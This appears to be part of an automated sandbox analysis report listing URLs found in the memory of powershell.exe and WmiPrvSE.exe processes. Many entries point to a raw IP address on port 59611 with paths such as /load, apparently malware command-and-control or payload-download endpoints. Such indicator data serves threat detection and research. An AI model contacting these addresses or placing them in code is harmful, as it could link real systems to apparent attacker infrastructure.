Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.9.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: powershell.exe, 00000009.00000002.1611147208.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en8
Source: powershell.exe, 00000009.00000002.1578339616.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1600170411.00000000058EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1532861117.000000000646C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1557726516.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1566977272.00000000062CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1578339616.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1526031150.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1530745169.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1533999490.0000000005261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1534232115.0000000004771000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1586466556.0000000007003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215/pq
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215/xq
Source: WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/
Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611//F
Source: WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859777819.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/3X
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/5F.J
Source: WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/9
Source: WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/92.215:59611/
Source: WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/92.215:59611/sX(J
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/GFxJ(
Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/HF
Source: WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/KX0J
Source: WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/MFvJ&
Source: WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/YF
Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/ad
Source: WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/ad5F.J
Source: WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/adGFxJ(
Source: WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/kFTJ
Source: WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/kX
Source: WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load
Source: WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load.215:59611/
Source: WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load.215:59611/BFsJ
Source: WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load.215:59611/GFxJ(
Source: WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load.215:59611/adMFvJ&
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load.215:59611/load
Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load.215:59611/loadGFxJ(
Source: WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load.215:59611/oad
Source: WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://45.76.192.215:59611/load21
